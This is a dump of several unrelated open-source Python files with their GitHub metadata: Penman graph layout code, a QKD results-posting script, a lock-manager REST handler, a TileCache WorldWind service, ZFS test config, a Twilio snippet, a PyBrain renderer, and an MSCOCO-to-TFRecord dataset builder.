        b : ('b', ':ARG0', 'g')
        g : ('g', ':instance', 'gamma')
        a : ('g', ':ARG0', 'a')
    """
    variables = g.variables()
    # Simulate the serializer's node-context stack over the triples.
    stack = [g.top]
    contexts: List[Union[Variable, None]] = [None] * len(g.triples)
    for i, triple in enumerate(g.triples):
        eligible: List[Variable] = [triple[0]]
        if triple[1] != CONCEPT_ROLE and triple[2] in variables:
            eligible.append(cast(Variable, triple[2]))
        if stack[-1] not in eligible:
            # The triple cannot belong to the current context; stop and
            # leave the remaining contexts as None.
            break
        else:
            contexts[i] = stack[-1]
        pushed = get_pushed_variable(g, triple)
        if pushed:
            stack.append(pushed)
        try:
            for epi in g.epidata[triple]:
                if isinstance(epi, Pop):
                    stack.pop()
        except IndexError:
            break  # more POPs than contexts in stack
    return contexts
| {
"content_hash": "9c50be41f8d69399ef0bb8e15c4290a9",
"timestamp": "",
"source": "github",
"line_count": 670,
"max_line_length": 79,
"avg_line_length": 33.17462686567164,
"alnum_prop": 0.5581499977504837,
"repo_name": "goodmami/penman",
"id": "fc569dd3d9c7afc6efe70b29b21d1c9c8af2815b",
"size": "22252",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "penman/layout.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "186533"
}
],
"symlink_target": ""
} |
import subprocess
from shlex import split  # kept for compatibility; no longer used below
import sys

CGI = 'http://lain.sfc.wide.ad.jp/qkd/result.cgi'

# Build the argument vector directly instead of shlex-splitting a string
# concatenated with sys.argv[1]: the original broke (or allowed wget option
# injection) when the argument contained spaces, quotes, or a leading '-'.
cmd = [
    'wget', '-q', '-O', '-', '--no-check-certificate',
    '--post-data', 'result=' + sys.argv[1],
    CGI,
]
subprocess.call(cmd)
| {
"content_hash": "c01e2a67a87741147fba2e7d93efc1ab",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 91,
"avg_line_length": 28.375,
"alnum_prop": 0.6740088105726872,
"repo_name": "iomz/qkd-laser-experiment",
"id": "a3d720745c71d9466467b81fe55e6f8861450909",
"size": "244",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "prototype/carol/lain_post.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "28770"
},
{
"name": "Python",
"bytes": "28509"
}
],
"symlink_target": ""
} |
from rdlm.request_handler import RequestHandler, admin_authenticated
from rdlm.lock import LOCK_MANAGER_INSTANCE
from rdlm.hal import Resource
class ResourceHandler(RequestHandler):
    """Class which handles the /resources/[resource] URL"""

    SUPPORTED_METHODS = ['GET', 'DELETE']

    @admin_authenticated
    def delete(self, name):
        """Delete the named resource and all of its locks.

        Replies 204 on success, 404 when no resource with locks exists.
        """
        if LOCK_MANAGER_INSTANCE.remove_resource(name):
            self.send_status(204)
        else:
            self.send_error(404, message="no resource (with locks) found")

    @admin_authenticated
    def get(self, name):
        """Reply with a JSON-HAL representation of the named resource,
        embedding one sub-resource per held lock."""
        state = LOCK_MANAGER_INSTANCE.get_resource_as_dict(name)
        resource = Resource(self.reverse_url("resource", name), {"name": name})
        if state:
            for lock_dict in state['locks']:
                lock_url = self.reverse_url("lock", name, lock_dict['uid'])
                resource.add_embedded_resource("locks",
                                               Resource(lock_url, lock_dict))
        self.set_header("Content-Type", "application/hal+json")
        self.finish(resource.to_json())
| {
"content_hash": "91486d1cbb60e9567c583b9a28ce3a69",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 92,
"avg_line_length": 37.05555555555556,
"alnum_prop": 0.6251874062968515,
"repo_name": "thefab/restful-distributed-lock-manager",
"id": "04d58c7bf063c361a51f94804c5b06f41b64233d",
"size": "1516",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rdlm/resource_handler.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "53356"
}
],
"symlink_target": ""
} |
from TileCache.Service import Request, Capabilities
import TileCache.Layer as Layer
class WorldWind (Request):
    """TileCache request handler speaking the NASA WorldWind tile protocol."""

    def parse (self, fields, path, host):
        """Dispatch a WorldWind request.

        Extracts the t/l/x/y/request parameters (accepting upper- or
        lower-case keys) and returns capabilities XML or a tile.

        Fix: ``dict.has_key`` (Python-2-only) replaced with the ``in``
        operator, which behaves identically on both Python 2 and 3.
        """
        param = {}
        for key in ['t', 'l', 'x', 'y', 'request']:
            if key.upper() in fields:
                param[key] = fields[key.upper()]
            elif key in fields:
                param[key] = fields[key]
            else:
                param[key] = ""
        if param["request"] == "GetCapabilities" or param["request"] == "metadata":
            return self.getCapabilities(host + path, param)
        else:
            return self.getMap(param)

    def getMap (self, param):
        """Return the Layer.Tile addressed by the t (layer), l (level),
        x and y parameters."""
        layer = self.getLayer(param["t"])
        level = int(param["l"])
        y = float(param["y"])
        x = float(param["x"])
        tile = Layer.Tile(layer, x, y, level)
        return tile

    def getCapabilities (self, host, param):
        """Build the WorldWind LayerSet capabilities XML for all
        EPSG:4326 layers of this service."""
        metadata = self.service.metadata
        # NOTE(review): 'description' and 'formats' are computed but never
        # used in the generated XML -- confirm dead before removing.
        if "description" in metadata:
            description = metadata["description"]
        else:
            description = ""
        formats = {}
        for layer in self.service.layers.values():
            formats[layer.format()] = 1
        formats = formats.keys()
        xml = """<?xml version="1.0" encoding="UTF-8" ?>
<LayerSet Name="TileCache" ShowAtStartup="true" ShowOnlyOneLayers="false">
"""
        for name, layer in self.service.layers.items():
            # WorldWind only understands unprojected (EPSG:4326) layers.
            if (layer.srs != "EPSG:4326"): continue
            xml += """
<ChildLayerSet Name="%s" ShowAtStartup="false" ShowOnlyOneLayer="true">
<QuadTileSet ShowAtStartup="true">
<Name>%s</Name>
<Description>Layer: %s</Description>
<DistanceAboveSurface>0</DistanceAboveSurface>
<BoundingBox>
<West><Value>%s</Value></West>
<South><Value>%s</Value></South>
<East><Value>%s</Value></East>
<North><Value>%s</Value></North>
</BoundingBox>
<TerrainMapped>false</TerrainMapped>
<!-- I have no clue what this means. -->
<ImageAccessor>
<LevelZeroTileSizeDegrees>%s</LevelZeroTileSizeDegrees>
<NumberLevels>%s</NumberLevels>
<TextureSizePixels>%s</TextureSizePixels>
<ImageFileExtension>%s</ImageFileExtension>
<ImageTileService>
<ServerUrl>%s</ServerUrl>
<DataSetName>%s</DataSetName>
</ImageTileService>
</ImageAccessor>
<ExtendedInformation>
<Abstract>SRS:%s</Abstract>
<!-- WorldWind doesn't have any place to store the SRS -->
</ExtendedInformation>
</QuadTileSet>
</ChildLayerSet>
""" % (name, name, layer.description, float(layer.bbox[0]), float(layer.bbox[1]),
       float(layer.bbox[2]), float(layer.bbox[3]), layer.resolutions[0] * layer.size[0],
       len(layer.resolutions), layer.size[0], layer.extension, host,
       name, layer.srs)
        xml += """
</LayerSet>"""
        return Capabilities("text/xml", xml)
| {
"content_hash": "842c19c4537d60684800a9be641c71df",
"timestamp": "",
"source": "github",
"line_count": 88,
"max_line_length": 105,
"avg_line_length": 39.06818181818182,
"alnum_prop": 0.4985456660849331,
"repo_name": "pcucurullo/groot",
"id": "665adc37d38968429c6bd3eb07c99b4b1269d71d",
"size": "3502",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "public/cgi/TileCache/Services/WorldWind.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "ApacheConf",
"bytes": "2870"
},
{
"name": "C",
"bytes": "7006"
},
{
"name": "CSS",
"bytes": "7538133"
},
{
"name": "HTML",
"bytes": "49958485"
},
{
"name": "JavaScript",
"bytes": "60060170"
},
{
"name": "Makefile",
"bytes": "2100"
},
{
"name": "PHP",
"bytes": "4381269"
},
{
"name": "PLpgSQL",
"bytes": "30016"
},
{
"name": "Python",
"bytes": "344097"
},
{
"name": "SQLPL",
"bytes": "17423"
},
{
"name": "Shell",
"bytes": "15692"
},
{
"name": "XSLT",
"bytes": "2204"
}
],
"symlink_target": ""
} |
import configparser

# Reads the [perf_tests] section of config.cfg and exposes each setting as a
# module-level name for the ZFS performance-test scripts to import.
# NOTE(review): config.read() silently returns nothing if the file is missing,
# so a bad path surfaces later as a NoSectionError from the get() calls below.
config = configparser.ConfigParser()
config.read('config.cfg')
# Name of the ZFS pool the tests run against.
main_pool = config.get('perf_tests', 'main_pool')
# zfs filesystems start with a pool name and have their paths separated by
# forward slashes
test_filesystem_path = main_pool + '/' + config.get('perf_tests', 'test_filesystem')
# This will be the full path to the file that will be zfs received during the
# tests.
test_file_full_path = config.get('perf_tests', 'test_file')
# The directory the tests will occur in.
mount_point = config.get('perf_tests', 'mount_point')
# The directory to place logs in.
log_directory = config.get('perf_tests', 'log_directory')
# The directory to put starting and ending results in.
results_directory = config.get('perf_tests', 'results_directory')
# The directory for running system statistics during a run.
stats_directory = config.get('perf_tests', 'stats_directory')
| {
"content_hash": "0eda528ceb3c4469fc9b6d1fd0f71b35",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 84,
"avg_line_length": 34.42307692307692,
"alnum_prop": 0.7418994413407821,
"repo_name": "stevenburgess/zfs-tests",
"id": "be875fdb1a09e4a4919d2e6ed8288270ec83e585",
"size": "895",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Configs.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "19204"
}
],
"symlink_target": ""
} |
from twilio.rest import TwilioRestClient

# Your Account Sid and Auth Token from twilio.com/user/account
# NOTE(review): placeholder credentials -- replace before running.
account_sid = "ACXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
auth_token = "your_auth_token"
client = TwilioRestClient(account_sid, auth_token)

# A list of account objects with the properties described above,
# filtered server-side to accounts whose status is "active".
accounts = client.accounts.list(status="active")
| {
"content_hash": "3375b5d6bf3e0e45ffae9a93c5b90167",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 63,
"avg_line_length": 39.111111111111114,
"alnum_prop": 0.8039772727272727,
"repo_name": "teoreteetik/api-snippets",
"id": "b695abdf90b18e3460813128bf600d8cbe396efa",
"size": "425",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rest/accounts/list-get-example-2/list-get-example-2.5.x.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C#",
"bytes": "643369"
},
{
"name": "HTML",
"bytes": "335"
},
{
"name": "Java",
"bytes": "943336"
},
{
"name": "JavaScript",
"bytes": "539577"
},
{
"name": "M",
"bytes": "117"
},
{
"name": "Mathematica",
"bytes": "93"
},
{
"name": "Objective-C",
"bytes": "46198"
},
{
"name": "PHP",
"bytes": "538312"
},
{
"name": "Python",
"bytes": "467248"
},
{
"name": "Ruby",
"bytes": "470316"
},
{
"name": "Shell",
"bytes": "1564"
},
{
"name": "Swift",
"bytes": "36563"
}
],
"symlink_target": ""
} |
__author__ = 'Thomas Rueckstiess, ruecksti@in.tum.de'
from pylab import plot, figure, ion, Line2D, draw, arange #@UnresolvedImport
from pybrain.rl.environments.renderer import Renderer
import threading
import time
class SimpleRenderer(Renderer):
    """Matplotlib-based renderer that draws a function curve and, on top of
    it, the exploration path of an RL agent.

    All mutable state (path, function, stop flag) is guarded by ``dataLock``
    because updateData()/setFunction() are called from the experiment thread
    while _render() runs in the renderer thread.
    """

    def __init__(self):
        Renderer.__init__(self)
        self.dataLock = threading.Lock()
        self.stopRequest = False
        self.pathx = []
        self.pathy = []
        self.f = None        # function to plot, set via setFunction()
        self.min = -1        # plotting range for f
        self.max = 1
        self.fig = None
        self.color = 'red'   # color of the exploration path line

    def setFunction(self, f, rmin, rmax):
        """Set the function to draw and its [rmin, rmax] plotting range."""
        self.dataLock.acquire()
        self.f = f
        self.min = rmin
        self.max = rmax
        self.dataLock.release()

    def updateData(self, data):
        """Append an (x, y) sample to the exploration path."""
        self.dataLock.acquire()
        (x, y) = data
        self.pathx.append(x)
        self.pathy.append(y)
        self.dataLock.release()

    def reset(self):
        """Clear the exploration path."""
        self.dataLock.acquire()
        self.pathx = []
        self.pathy = []
        self.dataLock.release()

    def stop(self):
        """Ask the render loop to exit after its current iteration."""
        self.dataLock.acquire()
        self.stopRequest = True
        self.dataLock.release()

    def start(self):
        """Create the figure, then hand control to the base-class loop."""
        self.drawPlot()
        Renderer.start(self)

    def drawPlot(self):
        """Set up the interactive figure: function curve plus path artist."""
        ion()
        self.fig = figure()
        axes = self.fig.add_subplot(111)
        # draw function
        xvalues = arange(self.min, self.max, 0.1)
        # BUGFIX: materialize the mapped values in a list. On Python 3,
        # map() returns a one-shot iterator that plot() would exhaust,
        # making the min()/max() calls below fail.
        yvalues = [self.f(x) for x in xvalues]
        plot(xvalues, yvalues)
        # draw exploration path; use the configured color rather than a
        # hard-coded 'red' (default is unchanged, _render re-applies it).
        self.line = Line2D([], [], linewidth=3, color=self.color)
        axes.add_artist(self.line)
        self.line.set_clip_box(axes.bbox)
        # set axes limits with a small margin around the data
        axes.set_xlim(min(xvalues) - 0.5, max(xvalues) + 0.5)
        axes.set_ylim(min(yvalues) - 0.5, max(yvalues) + 0.5)

    def _render(self):
        """Render loop: redraw the current path ~20x/s until stop() is called."""
        while not self.stopRequest:
            self.dataLock.acquire()
            self.line.set_data(self.pathx, self.pathy)
            self.line.set_color(self.color)
            figure(self.fig.number)   # make our figure current before draw()
            draw()
            self.dataLock.release()
            time.sleep(0.05)
        self.stopRequest = False
| {
"content_hash": "6d97499c3be10ea3dcc04f05789744c3",
"timestamp": "",
"source": "github",
"line_count": 80,
"max_line_length": 76,
"avg_line_length": 27.8125,
"alnum_prop": 0.5420224719101123,
"repo_name": "daanwierstra/pybrain",
"id": "7be0a6dec36c84ac56dfb03958b8f7e504689594",
"size": "2225",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pybrain/rl/environments/simple/renderer.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C++",
"bytes": "380415"
},
{
"name": "Python",
"bytes": "1279804"
},
{
"name": "Shell",
"bytes": "121"
}
],
"symlink_target": ""
} |
class PublicationFailed(Exception):
    """Raised when a publish operation could not be completed."""
| {
"content_hash": "8a11586414937d6530aa0b201a541d56",
"timestamp": "",
"source": "github",
"line_count": 2,
"max_line_length": 35,
"avg_line_length": 22.5,
"alnum_prop": 0.7777777777777778,
"repo_name": "ONSdigital/eq-survey-runner",
"id": "d3a05faaadf1d86f12d9704bf4885fe804ee0a07",
"size": "45",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/publisher/exceptions.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "520"
},
{
"name": "HTML",
"bytes": "236859"
},
{
"name": "JavaScript",
"bytes": "423942"
},
{
"name": "Python",
"bytes": "1409591"
},
{
"name": "SCSS",
"bytes": "25858"
},
{
"name": "Shell",
"bytes": "10196"
}
],
"symlink_target": ""
} |
"""Converts MSCOCO data to TFRecord file format with SequenceExample protos.
The MSCOCO images are expected to reside in JPEG files located in the following
directory structure:
train_image_dir/COCO_train2014_000000000151.jpg
train_image_dir/COCO_train2014_000000000260.jpg
...
and
val_image_dir/COCO_val2014_000000000042.jpg
val_image_dir/COCO_val2014_000000000073.jpg
...
The MSCOCO annotations JSON files are expected to reside in train_captions_file
and val_captions_file respectively.
This script converts the combined MSCOCO data into sharded data files consisting
of 256, 4 and 8 TFRecord files, respectively:
output_dir/train-00000-of-00256
output_dir/train-00001-of-00256
...
output_dir/train-00255-of-00256
and
output_dir/val-00000-of-00004
...
output_dir/val-00003-of-00004
and
output_dir/test-00000-of-00008
...
output_dir/test-00007-of-00008
Each TFRecord file contains ~2300 records. Each record within the TFRecord file
is a serialized SequenceExample proto consisting of precisely one image-caption
pair. Note that each image has multiple captions (usually 5) and therefore each
image is replicated multiple times in the TFRecord files.
The SequenceExample proto contains the following fields:
context:
image/image_id: integer MSCOCO image identifier
image/data: string containing JPEG encoded image in RGB colorspace
feature_lists:
image/caption: list of strings containing the (tokenized) caption words
image/caption_ids: list of integer ids corresponding to the caption words
The captions are tokenized using the NLTK (http://www.nltk.org/) word tokenizer.
The vocabulary of word identifiers is constructed from the sorted list (by
descending frequency) of word tokens in the training set. Only tokens appearing
at least 4 times are considered; all other words get the "unknown" word id.
NOTE: This script will consume around 100GB of disk space because each image
in the MSCOCO dataset is replicated ~5 times (once per caption) in the output.
This is done for two reasons:
1. In order to better shuffle the training data.
2. It makes it easier to perform asynchronous preprocessing of each image in
TensorFlow.
Running this script using 16 threads may take around 1 hour on a HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os.path
import random
import sys
import threading
from collections import Counter
from collections import namedtuple
from datetime import datetime
import nltk.tokenize
import numpy as np
import tensorflow as tf
# --- Input/output locations for the raw MSCOCO data and TFRecord output. ---
tf.flags.DEFINE_string("train_image_dir", "/tmp/train2014/",
                       "Training image directory.")
tf.flags.DEFINE_string("val_image_dir", "/tmp/val2014",
                       "Validation image directory.")
tf.flags.DEFINE_string("train_captions_file", "/tmp/captions_train2014.json",
                       "Training captions JSON file.")
tf.flags.DEFINE_string("val_captions_file", "/tmp/captions_val2014.json",
                       "Validation captions JSON file.")
tf.flags.DEFINE_string("output_dir", "/tmp/", "Output data directory.")

# --- Sharding: each split is written as this many TFRecord files. ---
tf.flags.DEFINE_integer("train_shards", 256,
                        "Number of shards in training TFRecord files.")
tf.flags.DEFINE_integer("val_shards", 4,
                        "Number of shards in validation TFRecord files.")
tf.flags.DEFINE_integer("test_shards", 8,
                        "Number of shards in testing TFRecord files.")

# --- Vocabulary construction parameters. ---
tf.flags.DEFINE_string("start_word", "<S>",
                       "Special word added to the beginning of each sentence.")
tf.flags.DEFINE_string("end_word", "</S>",
                       "Special word added to the end of each sentence.")
tf.flags.DEFINE_string("unknown_word", "<UNK>",
                       "Special word meaning 'unknown'.")
tf.flags.DEFINE_integer("min_word_count", 4,
                        "The minimum number of occurrences of each word in the "
                        "training set for inclusion in the vocabulary.")
tf.flags.DEFINE_string("word_counts_output_file", "/tmp/word_counts.txt",
                       "Output vocabulary file of word counts.")

tf.flags.DEFINE_integer("num_threads", 8,
                        "Number of threads to preprocess the images.")

FLAGS = tf.flags.FLAGS

# One image-caption record: integer MSCOCO id, path to the JPEG file, and a
# list of (tokenized) captions for that image.
ImageMetadata = namedtuple("ImageMetadata",
                           ["image_id", "filename", "captions"])
class Vocabulary(object):
    """Word-to-id lookup table with a fallback id for out-of-vocabulary words."""

    def __init__(self, vocab, unk_id):
        """Initializes the vocabulary.

        Args:
          vocab: A dictionary of word to word_id.
          unk_id: Id of the special 'unknown' word.
        """
        self._vocab = vocab
        self._unk_id = unk_id

    def word_to_id(self, word):
        """Returns the integer id of a word string."""
        return self._vocab.get(word, self._unk_id)
class ImageDecoder(object):
    """Helper class for decoding images in TensorFlow."""

    def __init__(self):
        # Create a single TensorFlow Session for all image decoding calls.
        # The decode graph is built once and reused for every image.
        self._sess = tf.Session()

        # TensorFlow ops for JPEG decoding; channels=3 forces RGB output.
        self._encoded_jpeg = tf.placeholder(dtype=tf.string)
        self._decode_jpeg = tf.image.decode_jpeg(self._encoded_jpeg, channels=3)

    def decode_jpeg(self, encoded_jpeg):
        """Decodes a JPEG byte string into a height x width x 3 image array.

        Raises tf.errors.InvalidArgumentError for invalid JPEG data and
        AssertionError if the decoded tensor is not rank-3 with 3 channels;
        callers rely on both to skip corrupt images.
        """
        image = self._sess.run(self._decode_jpeg,
                               feed_dict={self._encoded_jpeg: encoded_jpeg})
        assert len(image.shape) == 3
        assert image.shape[2] == 3
        return image
def _int64_feature(value):
    """Wrapper for inserting a single int64 Feature into a SequenceExample proto."""
    return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _bytes_feature(value):
    """Wrapper for inserting a single bytes Feature into a SequenceExample proto."""
    # NOTE(review): str(value) assumes Python 2 (str == bytes); under Python 3
    # this would stringify bytes objects rather than pass them through --
    # confirm before porting.
    return tf.train.Feature(bytes_list=tf.train.BytesList(value=[str(value)]))
def _int64_feature_list(values):
    """Wrapper for inserting an int64 FeatureList into a SequenceExample proto."""
    return tf.train.FeatureList(feature=[_int64_feature(v) for v in values])
def _bytes_feature_list(values):
    """Wrapper for inserting a bytes FeatureList into a SequenceExample proto."""
    return tf.train.FeatureList(feature=[_bytes_feature(v) for v in values])
def _to_sequence_example(image, decoder, vocab):
    """Builds a SequenceExample proto for an image-caption pair.

    Args:
      image: An ImageMetadata object; image.captions must hold exactly one
        (already tokenized) caption.
      decoder: An ImageDecoder object used to sanity-check the JPEG data.
      vocab: A Vocabulary object.

    Returns:
      A SequenceExample proto, or None if the image file contains invalid
      JPEG data.
    """
    # BUGFIX: read in binary mode. Text mode ("r") performs newline
    # translation on some platforms, corrupting the JPEG byte stream, and on
    # Python 3 it would attempt to decode the bytes as text.
    with tf.gfile.FastGFile(image.filename, "rb") as f:
        encoded_image = f.read()

    try:
        decoder.decode_jpeg(encoded_image)
    except (tf.errors.InvalidArgumentError, AssertionError):
        print("Skipping file with invalid JPEG data: %s" % image.filename)
        return

    context = tf.train.Features(feature={
        "image/image_id": _int64_feature(image.image_id),
        "image/data": _bytes_feature(encoded_image),
    })

    assert len(image.captions) == 1
    caption = image.captions[0]
    caption_ids = [vocab.word_to_id(word) for word in caption]
    feature_lists = tf.train.FeatureLists(feature_list={
        "image/caption": _bytes_feature_list(caption),
        "image/caption_ids": _int64_feature_list(caption_ids)
    })
    sequence_example = tf.train.SequenceExample(
        context=context, feature_lists=feature_lists)

    return sequence_example
def _process_image_files(thread_index, ranges, name, images, decoder, vocab,
                         num_shards):
    """Processes and saves a subset of images as TFRecord files in one thread.

    Args:
      thread_index: Integer thread identifier within [0, len(ranges)].
      ranges: A list of pairs of integers specifying the ranges of the dataset to
        process in parallel.
      name: Unique identifier specifying the dataset.
      images: List of ImageMetadata.
      decoder: An ImageDecoder object.
      vocab: A Vocabulary object.
      num_shards: Integer number of shards for the output files.
    """
    # Each thread produces N shards where N = num_shards / num_threads. For
    # instance, if num_shards = 128, and num_threads = 2, then the first thread
    # would produce shards [0, 64).
    num_threads = len(ranges)
    assert not num_shards % num_threads
    num_shards_per_batch = int(num_shards / num_threads)

    # Evenly split this thread's image range into per-shard sub-ranges.
    shard_ranges = np.linspace(ranges[thread_index][0], ranges[thread_index][1],
                               num_shards_per_batch + 1).astype(int)
    num_images_in_thread = ranges[thread_index][1] - ranges[thread_index][0]

    counter = 0
    for s in xrange(num_shards_per_batch):
        # Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
        shard = thread_index * num_shards_per_batch + s
        output_filename = "%s-%.5d-of-%.5d" % (name, shard, num_shards)
        output_file = os.path.join(FLAGS.output_dir, output_filename)
        writer = tf.python_io.TFRecordWriter(output_file)
        shard_counter = 0
        images_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
        for i in images_in_shard:
            image = images[i]
            # _to_sequence_example returns None for invalid JPEG data; those
            # images are silently skipped (after a message it prints itself).
            sequence_example = _to_sequence_example(image, decoder, vocab)
            if sequence_example is not None:
                writer.write(sequence_example.SerializeToString())
                shard_counter += 1
                counter += 1

            # Periodic progress report, once per 1000 processed items.
            if not counter % 1000:
                print("%s [thread %d]: Processed %d of %d items in thread batch." %
                      (datetime.now(), thread_index, counter, num_images_in_thread))
                sys.stdout.flush()

        writer.close()
        print("%s [thread %d]: Wrote %d image-caption pairs to %s" %
              (datetime.now(), thread_index, shard_counter, output_file))
        sys.stdout.flush()
        shard_counter = 0
    print("%s [thread %d]: Wrote %d image-caption pairs to %d shards." %
          (datetime.now(), thread_index, counter, num_shards_per_batch))
    sys.stdout.flush()
def _process_dataset(name, images, vocab, num_shards):
    """Processes a complete data set and saves it as a TFRecord.

    Args:
      name: Unique identifier specifying the dataset.
      images: List of ImageMetadata.
      vocab: A Vocabulary object.
      num_shards: Integer number of shards for the output files.
    """
    # Break up each image into a separate entity for each caption, so every
    # output record holds exactly one image-caption pair.
    images = [ImageMetadata(image.image_id, image.filename, [caption])
              for image in images for caption in image.captions]

    # Shuffle the ordering of images. Make the randomization repeatable.
    random.seed(12345)
    random.shuffle(images)

    # Break the images into num_threads batches. Batch i is defined as
    # images[ranges[i][0]:ranges[i][1]].
    num_threads = min(num_shards, FLAGS.num_threads)
    spacing = np.linspace(0, len(images), num_threads + 1).astype(np.int)
    ranges = []
    threads = []
    for i in xrange(len(spacing) - 1):
        ranges.append([spacing[i], spacing[i + 1]])

    # Create a mechanism for monitoring when all threads are finished.
    coord = tf.train.Coordinator()

    # Create a utility for decoding JPEG images to run sanity checks.
    # Shared by all worker threads.
    decoder = ImageDecoder()

    # Launch a thread for each batch.
    print("Launching %d threads for spacings: %s" % (num_threads, ranges))
    for thread_index in xrange(len(ranges)):
        args = (thread_index, ranges, name, images, decoder, vocab, num_shards)
        t = threading.Thread(target=_process_image_files, args=args)
        t.start()
        threads.append(t)

    # Wait for all the threads to terminate.
    coord.join(threads)
    print("%s: Finished processing all %d image-caption pairs in data set '%s'." %
          (datetime.now(), len(images), name))
def _create_vocab(captions):
    """Creates the vocabulary of word to word_id.

    The vocabulary is saved to disk in a text file of word counts. The id of each
    word in the file is its corresponding 0-based line number.

    Args:
      captions: A list of lists of strings.

    Returns:
      A Vocabulary object.
    """
    print("Creating vocabulary.")
    counter = Counter()
    for c in captions:
        counter.update(c)
    print("Total words:", len(counter))

    # Filter uncommon words and sort by descending count.
    word_counts = [x for x in counter.items() if x[1] >= FLAGS.min_word_count]
    word_counts.sort(key=lambda x: x[1], reverse=True)
    print("Words in vocabulary:", len(word_counts))

    # Write out the word counts file.
    with tf.gfile.FastGFile(FLAGS.word_counts_output_file, "w") as f:
        f.write("\n".join(["%s %d" % (w, c) for w, c in word_counts]))
    print("Wrote vocabulary file:", FLAGS.word_counts_output_file)

    # Create the vocabulary dictionary. The unknown-word id is one past the
    # last real word id.
    reverse_vocab = [x[0] for x in word_counts]
    unk_id = len(reverse_vocab)
    vocab_dict = dict([(x, y) for (y, x) in enumerate(reverse_vocab)])
    vocab = Vocabulary(vocab_dict, unk_id)

    return vocab
def _process_caption(caption):
    """Processes a caption string into a list of tokenized words.

    Args:
      caption: A string caption.

    Returns:
      A list of strings; the lower-cased, tokenized caption bracketed by the
      special start and end words.
    """
    tokenized_caption = [FLAGS.start_word]
    tokenized_caption.extend(nltk.tokenize.word_tokenize(caption.lower()))
    tokenized_caption.append(FLAGS.end_word)
    return tokenized_caption
def _load_and_process_metadata(captions_file, image_dir):
    """Loads image metadata from a JSON file and processes the captions.

    Args:
      captions_file: JSON file containing caption annotations.
      image_dir: Directory containing the image files.

    Returns:
      A list of ImageMetadata.
    """
    with tf.gfile.FastGFile(captions_file, "r") as f:
        caption_data = json.load(f)

    # Extract the filenames.
    id_to_filename = [(x["id"], x["file_name"]) for x in caption_data["images"]]

    # Extract the captions. Each image_id is associated with multiple captions.
    id_to_captions = {}
    for annotation in caption_data["annotations"]:
        image_id = annotation["image_id"]
        caption = annotation["caption"]
        id_to_captions.setdefault(image_id, [])
        id_to_captions[image_id].append(caption)

    # Sanity check: every image has at least one caption and vice versa.
    assert len(id_to_filename) == len(id_to_captions)
    assert set([x[0] for x in id_to_filename]) == set(id_to_captions.keys())
    print("Loaded caption metadata for %d images from %s" %
          (len(id_to_filename), captions_file))

    # Process the captions and combine the data into a list of ImageMetadata.
    print("Processing captions.")
    image_metadata = []
    num_captions = 0
    for image_id, base_filename in id_to_filename:
        filename = os.path.join(image_dir, base_filename)
        captions = [_process_caption(c) for c in id_to_captions[image_id]]
        image_metadata.append(ImageMetadata(image_id, filename, captions))
        num_captions += len(captions)
    print("Finished processing %d captions for %d images in %s" %
          (num_captions, len(id_to_filename), captions_file))

    return image_metadata
def main(unused_argv):
    def _is_valid_num_shards(num_shards):
        """Returns True if num_shards is compatible with FLAGS.num_threads."""
        return num_shards < FLAGS.num_threads or not num_shards % FLAGS.num_threads

    # Each split's shard count must divide evenly among the worker threads.
    assert _is_valid_num_shards(FLAGS.train_shards), (
        "Please make the FLAGS.num_threads commensurate with FLAGS.train_shards")
    assert _is_valid_num_shards(FLAGS.val_shards), (
        "Please make the FLAGS.num_threads commensurate with FLAGS.val_shards")
    assert _is_valid_num_shards(FLAGS.test_shards), (
        "Please make the FLAGS.num_threads commensurate with FLAGS.test_shards")

    if not tf.gfile.IsDirectory(FLAGS.output_dir):
        tf.gfile.MakeDirs(FLAGS.output_dir)

    # Load image metadata from caption files.
    mscoco_train_dataset = _load_and_process_metadata(FLAGS.train_captions_file,
                                                      FLAGS.train_image_dir)
    mscoco_val_dataset = _load_and_process_metadata(FLAGS.val_captions_file,
                                                    FLAGS.val_image_dir)

    # Redistribute the MSCOCO data as follows:
    #   train_dataset = 100% of mscoco_train_dataset + 85% of mscoco_val_dataset.
    #   val_dataset = 5% of mscoco_val_dataset (for validation during training).
    #   test_dataset = 10% of mscoco_val_dataset (for final evaluation).
    train_cutoff = int(0.85 * len(mscoco_val_dataset))
    val_cutoff = int(0.90 * len(mscoco_val_dataset))
    train_dataset = mscoco_train_dataset + mscoco_val_dataset[0:train_cutoff]
    val_dataset = mscoco_val_dataset[train_cutoff:val_cutoff]
    test_dataset = mscoco_val_dataset[val_cutoff:]

    # Create vocabulary from the training captions only (no leakage from
    # val/test splits).
    train_captions = [c for image in train_dataset for c in image.captions]
    vocab = _create_vocab(train_captions)

    _process_dataset("train", train_dataset, vocab, FLAGS.train_shards)
    _process_dataset("val", val_dataset, vocab, FLAGS.val_shards)
    _process_dataset("test", test_dataset, vocab, FLAGS.test_shards)


if __name__ == "__main__":
    tf.app.run()
| {
"content_hash": "439b0910cf7347eff272232598493424",
"timestamp": "",
"source": "github",
"line_count": 466,
"max_line_length": 84,
"avg_line_length": 37.51716738197425,
